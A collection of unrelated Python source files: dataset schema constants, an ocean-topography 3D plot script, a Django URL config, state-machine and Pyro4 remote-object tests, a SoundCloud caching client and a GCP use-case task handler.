OLIST_TABLE_ORDER_REVIEWS_COLUMNS = OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_ITEMS_TYPE_MAP = {
"order_id": str,
"order_item_id": "Int64",
"product_id": str,
"seller_id": str,
"shipping_limit_date": str,
"price": float,
"freight_value": float,
}
OLIST_TABLE_ORDER_ITEMS_COLUMNS = OLIST_TABLE_ORDER_ITEMS_TYPE_MAP.keys()
OLIST_DATASET_TABLES_TYPES_MAP = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP,
OLIST_TABLE_GEOLOCATION: OLIST_TABLE_GEOLOCATION_TYPE_MAP,
OLIST_TABLE_CUSTOMERS: OLIST_TABLE_CUSTOMERS_TYPE_MAP,
OLIST_TABLE_ORDERS: OLIST_TABLE_ORDERS_TYPE_MAP,
OLIST_TABLE_PRODUCTS: OLIST_TABLE_PRODUCTS_TYPE_MAP,
OLIST_TABLE_SELLERS: OLIST_TABLE_SELLERS_TYPE_MAP,
OLIST_TABLE_ORDER_PAYMENTS: OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP,
OLIST_TABLE_ORDER_REVIEWS: OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP,
OLIST_TABLE_ORDER_ITEMS: OLIST_TABLE_ORDER_ITEMS_TYPE_MAP,
}
OLIST_DATASET_TABLES_NULLABLE_COLUMNS = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: [],
OLIST_TABLE_GEOLOCATION: [],
OLIST_TABLE_CUSTOMERS: [],
OLIST_TABLE_ORDERS: [],
OLIST_TABLE_PRODUCTS: [],
OLIST_TABLE_SELLERS: [],
OLIST_TABLE_ORDER_PAYMENTS: [],
OLIST_TABLE_ORDER_REVIEWS: ["review_comment_title", "review_comment_message"],
OLIST_TABLE_ORDER_ITEMS: [],
}
WECR_DATASET_TABLE = "Womens_Clothing_E-Commerce_Reviews"
WECR_COLUMN_ID = "Unnamed: 0"
WECR_COLUMN_CLOTHING_ID = "Clothing ID"
WECR_COLUMN_AGE = "Age"
WECR_COLUMN_TITLE = "Title"
WECR_COLUMN_REVIEW_TEXT = "Review Text"
WECR_COLUMN_RATING = "Rating"
WECR_COLUMN_RECOMMENDED_IND = "Recommended IND"
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT = "Positive Feedback Count"
WECR_COLUMN_DIVISION_NAME = "Division Name"
WECR_COLUMN_DEPARTMENT_NAME = "Department Name"
WECR_COLUMN_CLASS_NAME = "Class Name"
WECR_COLUMN_NAME_MAP = {
WECR_COLUMN_ID: "id",
WECR_COLUMN_CLOTHING_ID: WECR_COLUMN_CLOTHING_ID.lower().replace(" ", "_"),
WECR_COLUMN_AGE: WECR_COLUMN_AGE.lower().replace(" ", "_"),
WECR_COLUMN_TITLE: WECR_COLUMN_TITLE.lower().replace(" ", "_"),
WECR_COLUMN_REVIEW_TEXT: WECR_COLUMN_REVIEW_TEXT.lower().replace(" ", "_"),
WECR_COLUMN_RATING: WECR_COLUMN_RATING.lower().replace(" ", "_"),
WECR_COLUMN_RECOMMENDED_IND: WECR_COLUMN_RECOMMENDED_IND.lower().replace(" ", "_"),
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: WECR_COLUMN_POSITIVE_FEEDBACK_COUNT.lower().replace(
" ", "_"
),
WECR_COLUMN_DIVISION_NAME: WECR_COLUMN_DIVISION_NAME.lower().replace(" ", "_"),
WECR_COLUMN_DEPARTMENT_NAME: WECR_COLUMN_DEPARTMENT_NAME.lower().replace(" ", "_"),
WECR_COLUMN_CLASS_NAME: WECR_COLUMN_CLASS_NAME.lower().replace(" ", "_"),
}
WECR_DATASET_COLUMNS_TYPE_MAP = {
WECR_COLUMN_CLOTHING_ID: "Int64",
WECR_COLUMN_AGE: "Int64",
WECR_COLUMN_TITLE: str,
WECR_COLUMN_REVIEW_TEXT: str,
WECR_COLUMN_RATING: "Int64",
WECR_COLUMN_RECOMMENDED_IND: "Int64",
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: "Int64",
WECR_COLUMN_DIVISION_NAME: str,
WECR_COLUMN_DEPARTMENT_NAME: str,
WECR_COLUMN_CLASS_NAME: str,
}
WECR_DATASET_COLUMNS = WECR_DATASET_COLUMNS_TYPE_MAP.keys()
WECR_DATASET_NULLABLE_COLUMNS = [
WECR_COLUMN_AGE,
WECR_COLUMN_TITLE,
WECR_COLUMN_REVIEW_TEXT,
WECR_COLUMN_RATING,
WECR_COLUMN_RECOMMENDED_IND,
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT,
WECR_COLUMN_DIVISION_NAME,
WECR_COLUMN_DEPARTMENT_NAME,
WECR_COLUMN_CLASS_NAME,
]
def MACRO_GET_DATASET_DIR(table):
return f"{DATA_DIR}/{table}{DATA_FILE_EXTENSION}"
def MACRO_GET_REQUIRED_COLUMNS(dataframe, nullable_columns):
nullable_cols = [col for col in dataframe.columns if col not in nullable_columns]
return nullable_cols if len(nullable_cols) > 0 else None
| 7,297 | 3,152 |
# coding: utf-8
# This script makes a 3D plot of the Southern Ocean topography.
#
# The data comes from some geophysiscists at Columbia. The product is "MGDS: Global Multi-Resolution Topography". These folks took all multibeam swath data that they can get their hands on and filled gaps with Smith and Sandwell. See http://www.marine-geo.org/portals/gmrt/ for data covarage.
import numpy as np
import matplotlib.pyplot as plt
# get_ipython().magic('matplotlib inline')
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import scipy as sp
import scipy.interpolate
import scipy.io as io
import seawater as sw
from pyspec import spectrum as spec
import cmocean
from mpl_toolkits.mplot3d import Axes3D
plt.close("all")
## select different regions
def subregion_plot(latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
lon = np.array([lonmin,lonmax,lonmax,lonmin,lonmin])
lat = np.array([latmin,latmin,latmax,latmax,latmin])
x,y = m(lon,lat)
return x,y
def extract_topo(lon,lat,latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
flat = (lat>=latmin)&(lat<=latmax)
flon = (lon>=lonmin)&(lon<=lonmax)
lont = lon[flon]
latt = lat[flat]
topo = z[flat,:]
topo = topo[:,flon]
return lont,latt,topo
topo = Dataset('GMRTv3_1_20160124topo.grd')
pf = Dataset('SO_polar_fronts.v3.nc')
lonpf, latpf,latsaf,latsafn = pf['lon'][:], pf['latPF'][:],pf['latSAF'][:], pf['latSAFN'][:]
time = pf['is_aviso_nrt'][:]
latpf = latpf.reshape(time.size,lonpf.size)
latpf = np.nanmean(latpf,axis=0).squeeze()
latsaf = latsaf.reshape(time.size,lonpf.size)
latsaf = np.nanmean(latsaf,axis=0).squeeze()
latsafn = latsafn.reshape(time.size,lonpf.size)
latsafn = np.nanmean(latsafn,axis=0).squeeze()
x = topo['lon'][:]
y = topo['lat'][:]
#z = (topo['z'][:]).reshape(y.size,x.size)
z = topo['altitude'][:]
# get a subset
latmin, latmax = -80., -20
lonmin, lonmax = -180., 180.
flat = (y>=latmin)&(y<=latmax)
flon = (x>=lonmin)&(x<=lonmax)
lat = y[flat]
lon = x[flon]
z = z[flat,:]
z = z[:,flon]
z = np.ma.masked_array(z,z>=0)
x,y = np.meshgrid(lon,lat)
lon,lat = np.meshgrid(lon,lat)
z[z>=0]=0.
fig = plt.figure(figsize=(22,8))
ax = fig.add_subplot(111, projection='3d')
# this controls the quality of the plot
# set to =1 for maximum quality
dec = 10
#ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec], [-2000, -1000], cmap=cmocean.cm.bathy_r)
surf = ax.plot_surface(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],
linewidth=0, rstride=1, cstride=1, alpha=1, cmap='YlGnBu',
vmin=-5500,vmax=-500)
ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],[-1.,0],colors='peru')
ax.set_zticks([])
ax.view_init(75, 290)
#ax.plot(xpf,ypf,'w.')
#ax.plot(xsaf,ysaf,'w.')
lonpf[lonpf>180] = lonpf[lonpf>180]-360
ax.plot(lonpf,latpf,-2000,'w.')
ax.plot(lonpf,latsaf,-2000,'w.')
ax.plot(lonpf,latsafn,-2000,'w.')
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.745, 0.2, 0.02, 0.4])
fig.colorbar(surf, cax=cbar_ax,label=r'',extend='both')
#plt.savefig('SO3DTopo.pdf',bbox_inches='tight')
plt.savefig('SO3DTopo.png',bbox_inches='tight',dpi=300)
#plt.show()
| 3,262 | 1,521 |
from django.conf.urls import url
from login.views import login
app_name = 'logins'
urlpatterns = [
url(r'^$', login, name='login')
] | 139 | 51 |
from behavior_machine.library.parallel_state import ParallelState
import time
from behavior_machine.core import Board, StateStatus, State, Machine, machine
from behavior_machine.library import IdleState
def test_repeat_node_in_machine_fast():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition_on_success(ds2)
ds2.add_transition_on_success(ds3)
ds3.add_transition_on_success(ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_validate_transition_immediate():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition(lambda s, b: True, ds2)
ds2.add_transition(lambda s, b: True, ds3)
ds3.add_transition(lambda s, b: True, ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_multiple_parallel_states():
class CompleteState(State):
def execute(self, board: Board) -> StateStatus:
return StateStatus.SUCCESS
num_parallel = 500
child_states = []
for i in range(0, num_parallel):
child_states.append(CompleteState(f"I{i}"))
pp = ParallelState("parallel", child_states)
exe = Machine('exe', pp, end_state_ids=['parallel'], rate=100)
start_time = time.time()
exe.start(None)
exe.wait()
elapsed_time = time.time() - start_time
assert elapsed_time < (1/10)
| 2,136 | 718 |
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1NFSVolumeSourceDict generated type."""
from typing import TypedDict
V1NFSVolumeSourceDict = TypedDict(
"V1NFSVolumeSourceDict",
{
"path": str,
"readOnly": bool,
"server": str,
},
total=False,
)
| 289 | 101 |
import soundcloud
import os
import logging
from datetime import datetime
import requests
import sys
from celeryconfig import mongolab
import pymongo
from pymongo import MongoClient
from pymongo.errors import OperationFailure
USER = '/users/{_id}'
USER_TRACKS = '/users/{_id}/tracks'
USER_FOLLOWINGS = '/users/{_id}/followings'
USER_FOLLOWERS = '/users/{_id}/followers'
USER_WEB_PROFILES = '/users/{_id}/web-profiles'
TRACK = '/tracks/{_id}'
TRACK_COMMENTS = '/tracks/{_id}/comments'
TRACK_FAVORITERS = '/tracks/{_id}/favoriters'
TRACK_DOWNLOAD = '/tracks/{_id}/download'
TRACK_STREAM = '/tracks/{_id}/stream'
class RequestDB(object):
client = None
db = None
coll = None
logger = None
def __init__(self, db_name="soundcloud", logger=logging.getLogger("")):
self.logger = logger
self.client = MongoClient(mongolab)
self.db = self.client[db_name]
self.coll = self.db.requests
try:
self.coll.ensure_index([("key", pymongo.ASCENDING),
("unique", True)])
except OperationFailure as e:
logger.error("Could not create index.")
logger.error(e)
def get(self, key):
v = self.coll.find_one({"key": key})
if v is not None:
return v["value"]
else:
return None
def set(self, key, value):
now = datetime.utcnow()
doc = {"key": key, "value": value, "retrieved": now}
self.coll.update({"key": key}, doc, upsert=True)
self.logger.info("Stored {} in db".format(key))
def close(self):
if self.db is not None:
self.db.close()
class Sc(object):
_sc_client = None
_db = None
_logger = None
def __init__(self, sc_client=None, db_name="soundcloud",
logger=logging.getLogger("")):
self._logger = logger
if sc_client is None:
sc_client_id = os.getenv('SOUNDCLOUD_CLIENT_ID')
if sc_client_id is None:
err = "SOUNDCLOUD_CLIENT_ID was not set!"
self._logger.error(err)
sys.exit(err)
sc_client = soundcloud.Client(client_id=sc_client_id)
self._sc_client = sc_client
self._db = RequestDB(db_name, logger)
def get_sc(self, template, _id=None):
key = template.format(_id=_id) if _id is not None else template
self._logger.info("GET {}".format(key))
value = self._db.get(key)
if value is not None:
return value
else:
if _id is None:
res = self._sc_client.get(key, allow_redirects=False)
track_url = res.location
return requests.get(track_url, stream=True)
else:
res = self._sc_client.get(key)
if hasattr(res, "data"):
res1 = [dict(o.fields()) for o in res]
self._db.set(key, res1)
return res1
elif hasattr(res, "fields"):
res1 = dict(res.fields())
self._logger.info(repr(res1))
self._db.set(key, res1)
return res1
else:
return res
def __del__(self):
if self._db is not None:
self._db.close()
def prefill_user(user_id):
"""Cache the basic info on a user"""
sc = Sc(db_name="soundcloud")
for t in [USER, USER_WEB_PROFILES,
USER_FOLLOWINGS, USER_TRACKS, USER_FOLLOWERS]:
sc.get_sc(t, user_id)
| 3,580 | 1,130 |
from api.gcp.tasks.baseTask import baseTask
from db.usecase.db_usecase_mgr import usecase_mgr
from googleapiclient.errors import HttpError
from utils.status_code import response_code
import traceback
import json
import logging
logger = logging.getLogger("main.api.gcp.tasks" + __name__)
class system_add_new_usecase(baseTask):
api_type = 'system'
api_name = 'system_add_new_usecase'
arguments = {
'usecase_name': {"type": str, "default": ''},
"region_country": {"type": str, "default": ''},
'validity_date': {"type": str, "default": ''},
"uc_des": {"type": str, "default": ''},
'admin_sa': {"type": str, "default": ''},
"budget": {"type": int, "default": 0},
'allow_cross_region': {"type": str, "default": ''},
"resources_access": {"type": str, "default": ''},
"uc_team_group": {"type": str, "default": ''},
"uc_owner_group": {"type": str, "default": ''},
"uc_label": {"type": str, "default": ''},
}
def __init__(self, stage_dict):
super(system_add_new_usecase, self).__init__(stage_dict)
# print('stage_dict:', stage_dict)
def execute(self, workspace_id=None, form_id=None, input_form_id=None, user_id=None):
try:
missing_set = set()
for key in self.arguments:
check_key = self.stage_dict.get(key, 'NotFound')
if check_key == 'NotFound':
missing_set.add(key)
# # print('{}: {}'.format(key, self.stage_dict[key]))
if len(missing_set) != 0:
data = response_code.BAD_REQUEST
data['msg'] = 'Missing parameters: {}'.format(', '.join(missing_set))
return data
else:
# print('self.stage_dict:', self.stage_dict)
usecase_info = self.stage_dict
usecase_info['workspace_id'] = workspace_id
usecase_info['uc_input_form'] = input_form_id
usecase_info['user_id'] = user_id
# usecase_info = {'workspace_id': workspace_id}
# uc_owner_group = self.stage_dict['uc_owner_group']
# usecase_info['uc_owner_group'] = uc_owner_group
data = usecase_mgr.add_new_usecase_setting(usecase_info)
if data['code'] == 200:
usecase_id = data['data']['usecase_id']
data1 = usecase_mgr.update_usecase_resource(workspace_id, usecase_id, usecase_info['uc_owner_group'])
return data
else:
return data
except HttpError as e:
error_json = json.loads(e.content, strict=False)
data = error_json['error']
data["msg"] = data.pop("message")
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
return data
except Exception as e:
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
data = response_code.BAD_REQUEST
data['msg'] = str(e)
return data | 3,163 | 961 |
"""
Tests for a running Pyro server, without timeouts.
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
import time
import sys
import uuid
import unittest
import Pyro4.core
import Pyro4.errors
import Pyro4.util
import Pyro4.message
from Pyro4 import threadutil, current_context
from testsupport import *
@Pyro4.expose
class ServerTestObject(object):
something = 99
dict_attr = {}
def __init__(self):
self._dictionary = {"number": 42}
self.dict_attr = {"number2": 43}
self._value = 12345
def getDict(self):
return self._dictionary
def getDictAttr(self):
return self.dict_attr
def multiply(self, x, y):
return x * y
def divide(self, x, y):
return x // y
def ping(self):
pass
def echo(self, obj):
return obj
@Pyro4.oneway
def oneway_delay(self, delay):
time.sleep(delay)
def delay(self, delay):
time.sleep(delay)
return "slept %d seconds" % delay
def delayAndId(self, delay, id):
time.sleep(delay)
return "slept for " + str(id)
def testargs(self, x, *args, **kwargs):
return [x, list(args), kwargs] # don't return tuples, this enables us to test json serialization as well.
def nonserializableException(self):
raise NonserializableError(("xantippe", lambda x: 0))
@Pyro4.oneway
def oneway_multiply(self, x, y):
return x * y
@property
def value(self):
return self._value
@value.setter
def value(self, newvalue):
self._value = newvalue
@property
def dictionary(self):
return self._dictionary
class NotEverythingExposedClass(object):
def __init__(self, name):
self.name = name
@Pyro4.expose
def getName(self):
return self.name
def unexposed(self):
return "you should not see this" # .... only when REQUIRE_EXPOSE is set to True is this valid
class DaemonLoopThread(threadutil.Thread):
def __init__(self, pyrodaemon):
super(DaemonLoopThread, self).__init__()
self.setDaemon(True)
self.pyrodaemon = pyrodaemon
self.running = threadutil.Event()
self.running.clear()
def run(self):
self.running.set()
try:
self.pyrodaemon.requestLoop()
except Pyro4.errors.CommunicationError:
pass # ignore pyro communication errors
class DaemonWithSabotagedHandshake(Pyro4.core.Daemon):
def _handshake(self, conn):
# receive the client's handshake data
msg = Pyro4.message.Message.recv(conn, [Pyro4.message.MSG_CONNECT], self._pyroHmacKey)
# return a CONNECTFAIL
serializer = Pyro4.util.get_serializer_by_id(msg.serializer_id)
data, _ = serializer.serializeData("rigged connection failure", compress=False)
msg = Pyro4.message.Message(Pyro4.message.MSG_CONNECTFAIL, data, serializer.serializer_id, 0, 1, hmac_key=self._pyroHmacKey)
conn.send(msg.to_bytes())
return False
class ServerTestsBrokenHandshake(unittest.TestCase):
def setUp(self):
Pyro4.config.LOGWIRE = True
Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
self.daemon = DaemonWithSabotagedHandshake(port=0)
obj = ServerTestObject()
uri = self.daemon.register(obj, "something")
self.objectUri = uri
self.daemonthread = DaemonLoopThread(self.daemon)
self.daemonthread.start()
self.daemonthread.running.wait()
time.sleep(0.05)
def tearDown(self):
time.sleep(0.05)
self.daemon.shutdown()
self.daemonthread.join()
Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")
def testDaemonConnectFail(self):
# check what happens when the daemon responds with a failed connection msg
with Pyro4.Proxy(self.objectUri) as p:
try:
p.ping()
self.fail("expected CommunicationError")
except Pyro4.errors.CommunicationError:
xv = sys.exc_info()[1]
message = str(xv)
self.assertIn("reason:", message)
self.assertIn("rigged connection failure", message)
class ServerTestsOnce(unittest.TestCase):
"""tests that are fine to run with just a single server type"""
def setUp(self):
Pyro4.config.LOGWIRE = True
Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
self.daemon = Pyro4.core.Daemon(port=0)
obj = ServerTestObject()
uri = self.daemon.register(obj, "something")
self.objectUri = uri
obj2 = NotEverythingExposedClass("hello")
self.daemon.register(obj2, "unexposed")
self.daemonthread = DaemonLoopThread(self.daemon)
self.daemonthread.start()
self.daemonthread.running.wait()
time.sleep(0.05)
def tearDown(self):
time.sleep(0.05)
if self.daemon is not None:
self.daemon.shutdown()
self.daemonthread.join()
Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")
def testPingMessage(self):
with Pyro4.core.Proxy(self.objectUri) as p:
p._pyroBind()
conn = p._pyroConnection
msg = Pyro4.message.Message(Pyro4.message.MSG_PING, b"something", 42, 0, 999, hmac_key=p._pyroHmacKey)
conn.send(msg.to_bytes())
msg = Pyro4.message.Message.recv(conn, [Pyro4.message.MSG_PING], hmac_key=p._pyroHmacKey)
self.assertEqual(Pyro4.message.MSG_PING, msg.type)
self.assertEqual(999, msg.seq)
self.assertEqual(b"pong", msg.data)
Pyro4.message.Message.ping(p._pyroConnection) # the convenience method that does the above
def testSequence(self):
with Pyro4.core.Proxy(self.objectUri) as p:
p.echo(1)
p.echo(2)
p.echo(3)
self.assertEqual(3, p._pyroSeq, "should have 3 method calls")
p._pyroSeq = 999 # hacking the seq nr won't have any effect because it is the reply from the server that is checked
self.assertEqual(42, p.echo(42))
def testMetaOffAttrs(self):
try:
old_meta = Pyro4.config.METADATA
Pyro4.config.METADATA = False
# should fail here, because there is no meta info about attributes
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual(55, p.multiply(5, 11))
x = p.getDict()
self.assertEqual({"number": 42}, x)
# property
with self.assertRaises(AttributeError):
p.dictionary.update({"more": 666})
# attribute
with self.assertRaises(AttributeError):
p.dict_attr.update({"more": 666})
x = p.getDict()
self.assertEqual({"number": 42}, x)
finally:
Pyro4.config.METADATA = old_meta
def testMetaOnAttrs(self):
try:
old_meta = Pyro4.config.METADATA
Pyro4.config.METADATA = True
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual(55, p.multiply(5, 11))
# property
x = p.getDict()
self.assertEqual({"number": 42}, x)
p.dictionary.update({"more": 666}) # should not fail because metadata is enabled and the dictionary property is retrieved as local copy
x = p.getDict()
self.assertEqual({"number": 42}, x) # not updated remotely because we had a local copy
with Pyro4.core.Proxy(self.objectUri) as p:
with self.assertRaises(AttributeError):
# attribute should fail (meta only works for exposed properties)
p.dict_attr.update({"more": 666})
finally:
Pyro4.config.METADATA = old_meta
def testSomeArgumentTypes(self):
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual([1, [], {}], p.testargs(1))
self.assertEqual([1, [2, 3], {'a': 4}], p.testargs(1, 2, 3, a=4))
self.assertEqual([1, [], {'a': 2}], p.testargs(1, **{'a': 2}))
def testUnicodeKwargs(self):
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual([1, [], {unichr(65): 2}], p.testargs(1, **{unichr(65): 2}))
result = p.testargs(unichr(0x20ac), **{unichr(0x20ac): 2})
self.assertEqual(result[0], unichr(0x20ac))
key = list(result[2].keys())[0]
self.assertTrue(type(key) is unicode)
self.assertEqual(key, unichr(0x20ac))
def testNormalProxy(self):
with Pyro4.core.Proxy(self.objectUri) as p:
self.assertEqual(42, p.multiply(7, 6))
def testExceptions(self):
with Pyro4.core.Proxy(self.objectUri) as p:
try:
p.divide(1, 0)
self.fail("should crash")
except ZeroDivisionError:
pass
try:
p.multiply("a", "b")
self.fail("should crash")
except TypeError:
pass
def testProxyMetadata(self):
with Pyro4.core.Proxy(self.objectUri) as p:
# unconnected proxies have empty metadata
self.assertEqual(set(), p._pyroAttrs)
self.assertEqual(set(), p._pyroMethods)
self.assertEqual(set(), p._pyroOneway)
# connecting it should obtain metadata (as long as METADATA is true)
p._pyroBind()
self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
self.assertEqual({'echo', 'getDict', 'divide', 'nonserializableException', 'ping', 'oneway_delay', 'delayAndId', 'delay', 'testargs',
'multiply', 'oneway_multiply', 'getDictAttr'}, p._pyroMethods)
self.assertEqual({'oneway_multiply', 'oneway_delay'}, p._pyroOneway)
p._pyroAttrs = None
p._pyroGetMetadata()
self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
p._pyroAttrs = None
p._pyroGetMetadata(self.objectUri.object)
self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
p._pyroAttrs = None
p._pyroGetMetadata(known_metadata={"attrs": set(), "oneway": set(), "methods": {"ping"}})
self.assertEqual(set(), p._pyroAttrs)
def testProxyAttrsMetadataOff(self):
try:
Pyro4.config.METADATA = False
# read attributes
with Pyro4.core.Proxy(self.objectUri) as p:
a = p.multiply
self.assertIsInstance(a, Pyro4.core._RemoteMethod)
a = p.value
self.assertIsInstance(a, Pyro4.core._RemoteMethod)
a = p.non_existing_attribute
self.assertIsInstance(a, Pyro4.core._RemoteMethod)
# set attributes
with Pyro4.core.Proxy(self.objectUri) as p:
p.some_weird_attribute = 42
self.assertEqual(42, p.some_weird_attribute)
finally:
Pyro4.config.METADATA = True
def testProxyAttrsMetadataOn(self):
try:
Pyro4.config.METADATA = True
# read attributes
with Pyro4.core.Proxy(self.objectUri) as p:
# unconnected proxy still has empty metadata.
# but, as soon as an attribute is used, the metadata is obtained (as long as METADATA is true)
a = p.value
self.assertEqual(12345, a)
a = p.multiply
self.assertIsInstance(a, Pyro4.core._RemoteMethod) # multiply is still a regular method
with self.assertRaises(AttributeError):
_ = p.non_existing_attribute
# set attributes, should also trigger getting metadata
with Pyro4.core.Proxy(self.objectUri) as p:
p.value = 42
self.assertEqual(42, p.value)
self.assertTrue("value" in p._pyroAttrs)
finally:
Pyro4.config.METADATA = True
def testProxyAnnotations(self):
class CustomAnnotationsProxy(Pyro4.core.Proxy):
def __init__(self, uri, response):
self.__dict__["response"] = response
super(CustomAnnotationsProxy, self).__init__(uri)
def _pyroAnnotations(self):
ann = super(CustomAnnotationsProxy, self)._pyroAnnotations()
ann["XYZZ"] = b"some data"
self.__dict__["response"]["annotations_sent"] = ann
return ann
def _pyroResponseAnnotations(self, annotations, msgtype):
self.__dict__["response"]["annotations"] = annotations
self.__dict__["response"]["msgtype"] = msgtype
response = {}
corr_id = current_context.correlation_id = uuid.uuid4()
with CustomAnnotationsProxy(self.objectUri, response) as p:
p.ping()
self.assertDictEqual({"CORR": corr_id.bytes, "XYZZ": b"some data"}, p.__dict__["response"]["annotations_sent"])
self.assertEqual(Pyro4.message.MSG_RESULT, p.__dict__["response"]["msgtype"])
self.assertDictEqual({"CORR": corr_id.bytes}, p.__dict__["response"]["annotations"])
def testExposedNotRequired(self):
try:
old_require = Pyro4.config.REQUIRE_EXPOSE
Pyro4.config.REQUIRE_EXPOSE = False
with self.daemon.proxyFor("unexposed") as p:
self.assertEqual({"unexposed", "getName"}, p._pyroMethods)
self.assertEqual("hello", p.getName())
self.assertEqual("you should not see this", p.unexposed()) # you *should* see it when REQUIRE_EXPOSE is False :)
finally:
Pyro4.config.REQUIRE_EXPOSE = old_require
def testExposedRequired(self):
try:
old_require = Pyro4.config.REQUIRE_EXPOSE
Pyro4.config.REQUIRE_EXPOSE = True
with self.daemon.proxyFor("unexposed") as p:
self.assertEqual({"getName"}, p._pyroMethods)
self.assertEqual("hello", p.getName())
with self.assertRaises(AttributeError) as e:
p.unexposed()
expected_msg = "remote object '%s' has no exposed attribute or method 'unexposed'" % p._pyroUri
self.assertEqual(expected_msg, str(e.exception))
with self.assertRaises(AttributeError) as e:
p.unexposed_set = 999
expected_msg = "remote object '%s' has no exposed attribute 'unexposed_set'" % p._pyroUri
self.assertEqual(expected_msg, str(e.exception))
finally:
Pyro4.config.REQUIRE_EXPOSE = old_require
def testProperties(self):
with Pyro4.core.Proxy(self.objectUri) as p:
_ = p.value
# metadata should be loaded now
self.assertEqual({"value", "dictionary"}, p._pyroAttrs)
with self.assertRaises(AttributeError):
_ = p.something
with self.assertRaises(AttributeError):
_ = p._dictionary
with self.assertRaises(AttributeError):
_ = p._value
self.assertEqual(12345, p.value)
self.assertEqual({"number": 42}, p.dictionary)
def testHasAttr(self):
try:
Pyro4.config.METADATA = False
with Pyro4.core.Proxy(self.objectUri) as p:
# with metadata off, all attributes are considered valid (and return a RemoteMethod object)
self.assertTrue(hasattr(p, "multiply"))
self.assertTrue(hasattr(p, "oneway_multiply"))
self.assertTrue(hasattr(p, "value"))
self.assertTrue(hasattr(p, "_value"))
self.assertTrue(hasattr(p, "_dictionary"))
self.assertTrue(hasattr(p, "non_existing_attribute"))
Pyro4.config.METADATA = True
with Pyro4.core.Proxy(self.objectUri) as p:
# with metadata on, hasattr actually gives proper results
self.assertTrue(hasattr(p, "multiply"))
self.assertTrue(hasattr(p, "oneway_multiply"))
self.assertTrue(hasattr(p, "value"))
self.assertFalse(hasattr(p, "_value"))
self.assertFalse(hasattr(p, "_dictionary"))
self.assertFalse(hasattr(p, "non_existing_attribute"))
finally:
Pyro4.config.METADATA = True
def testProxyMetadataKnown(self):
with Pyro4.core.Proxy(self.objectUri) as p:
# unconnected proxies have empty metadata
self.assertEqual(set(), p._pyroAttrs)
self.assertEqual(set(), p._pyroMethods)
self.assertEqual(set(), p._pyroOneway)
# set some metadata manually, they should be overwritten at connection time
p._pyroMethods = set("abc")
p._pyroAttrs = set("xyz")
p._pyroBind()
self.assertNotEqual(set("xyz"), p._pyroAttrs)
self.assertNotEqual(set("abc"), p._pyroMethods)
self.assertNotEqual(set(), p._pyroOneway)
def testNonserializableException_other(self):
with Pyro4.core.Proxy(self.objectUri) as p:
try:
p.nonserializableException()
self.fail("should crash")
except Exception:
xt, xv, tb = sys.exc_info()
self.assertTrue(issubclass(xt, Pyro4.errors.PyroError))
tblines = "\n".join(Pyro4.util.getPyroTraceback())
self.assertTrue("unsupported serialized class" in tblines)
def testNonserializableException_pickle(self):
with Pyro4.core.Proxy(self.objectUri) as p:
Pyro4.config.SERIALIZER = "pickle"
try:
p.nonserializableException()
self.fail("should crash")
except Exception:
xt, xv, tb = sys.exc_info()
self.assertTrue(issubclass(xt, Pyro4.errors.PyroError))
tblines = "\n".join(Pyro4.util.getPyroTraceback())
self.assertTrue("PyroError: Error serializing exception" in tblines)
s1 = "Original exception: <class 'testsupport.NonserializableError'>:"
s2 = "Original exception: <class 'PyroTests.testsupport.NonserializableError'>:"
self.assertTrue(s1 in tblines or s2 in tblines)
self.assertTrue("raise NonserializableError((\"xantippe" in tblines)
finally:
Pyro4.config.SERIALIZER = "serpent"
def testBatchProxy(self):
with Pyro4.core.Proxy(self.objectUri) as p:
batch = Pyro4.batch(p)
self.assertIsNone(batch.multiply(7, 6))
self.assertIsNone(batch.divide(999, 3))
self.assertIsNone(batch.ping())
self.assertIsNone(batch.divide(999, 0)) # force an exception here
self.assertIsNone(batch.multiply(3, 4)) # this call should not be performed after the error
results = batch()
self.assertEqual(42, next(results))
